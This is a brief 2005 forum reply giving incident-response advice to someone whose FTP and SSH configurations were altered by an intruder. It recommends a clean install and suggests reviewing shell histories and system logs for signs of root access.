If your attacker managed to alter your FTP and SSH configs, then I'd say it's a fair bet that she does have root on your machine. That being the case any cleanup short of a clean install is asking for trouble. Have a look at root's .bash_history and any other shell histories you can think of. Have a look at /var/log/messages - I don't know about Debian, but RH logs any 'su' events there, through PAM.
As for how the exploit works, I'd open a new thread to see if anyone can answer that. I know the theory behind general cracking methods, but I'm not familiar with any implementations.
Dave
Last edited by ilikejam; 08-18-2005 at 11:41 AM.
|